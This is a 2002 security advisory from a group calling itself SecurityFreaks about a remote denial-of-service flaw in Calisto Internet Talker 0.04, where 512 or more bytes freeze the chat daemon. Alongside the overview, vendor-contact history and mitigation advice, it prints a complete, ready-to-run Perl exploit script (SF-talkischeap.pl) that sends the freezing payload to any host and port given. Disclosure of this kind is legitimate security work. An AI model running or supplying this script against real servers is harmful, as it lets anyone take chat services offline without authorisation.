SFAD02-002: Calisto Internet Talker Remote DOS

["subversive " <subversive () linuxmail org>]

  [=================================================================]
  [...............:[  S e c u r i t y F r e a k s  ]:...............]
  [.................:[  www.securityfreaks.com  ]:..................]
  [=================================================================]




Title         : Calisto Internet Talker Remote DOS
Risk          : Moderate
Software      : Calisto Internet Talker Version 0.04 and prior
Platforms     : Linux/Solaris/Cygwin
Vendor URL    : http://www.arcsite.de/hp/flibble/calisto/
Discovered by : subversive <subversive () linuxmail org>
Advisory ID   : SFAD02-002




.....:[ Overview :


Calisto is an Internet Talker that allows many people to use telnet
to connect to the server and chat. Calisto is coded in C and runs on
Linux/Solaris/Cygwin platforms. It is available on sourceforge as 
well as http://www.arcsite.de/hp/flibble/calisto/.



.....:[ Details :

By sending 512 bytes or more to the Calisto daemon it is possible to
freeze it, resulting in a denial of service. Calisto comes with an
autorun shell script that has been written for the sole purpose of 
automatically restarting Calisto should it crash but unfortunately
this vulnerability will not cause Calisto to crash and segfault but
rather freeze until manually restarted.



.....:[ Vendor Status :

Vendor contacted 1st/5th/10th November 2002 but did not respond.



.....:[ Solution :

Due to the nature of this bug it posses as more of an annoyance than a
major security threat. If your concerned with the problem then simply
disable Calisto until an updated version or patch has been released. 
Hopefully Calisto's vendors will take notice of this advisory and do 
something about the problem.



.....:[ Exploit - SF-talkischeap.pl :

#!/usr/bin/perl
#
# S e c u r i t y F r e a k s
#  www.securityfreaks.com
#
# Calisto Internet Talker Version 0.04 Remote Denial of Service
#
#
# This exploit will not cause Calisto to crash but rather cause it 
# to freeze until manually restarted. This actually works out better 
# because Calisto comes with an autorun script that would restart it 
# should it crash anyway.
#
# [ subversive[at]linuxmail.org ] - *31/10/2002*


use IO::Socket;


$data = "A";
$size = "512";
$freeze .= $data x $size;

while($_ = $ARGV[0], /^-/) {
    shift;       
    last if /^--$/;
    /^-h/ && do { $host = shift; };
    /^-p/ && do { $port = shift; };
}

if(!$host != 0) {

print <<"ACTIONSSPEAKLOUDERTHANWORDS";
   
   S e c u r i t y F r e a k s
     www.securityfreaks.com

   SF-talkischeap.pl by subversive
   Calisto Internet Talker Version 0.04 Remote Denial of Service
  

   Usage :  $0 -h <host> -p <port>

ACTIONSSPEAKLOUDERTHANWORDS
exit;

}

my $sock = new IO::Socket::INET ( Proto    => "tcp",
                                  PeerAddr => $host,
                                  PeerPort => $port,
                                );
die "\nCould not connect to $host : $!\n" unless $sock;

print $sock "$freeze";
close($sock);
exit;


-- 
______________________________________________
http://www.linuxmail.org/
Now with POP3/IMAP access for only US$19.95/yr

Powered by Outblaze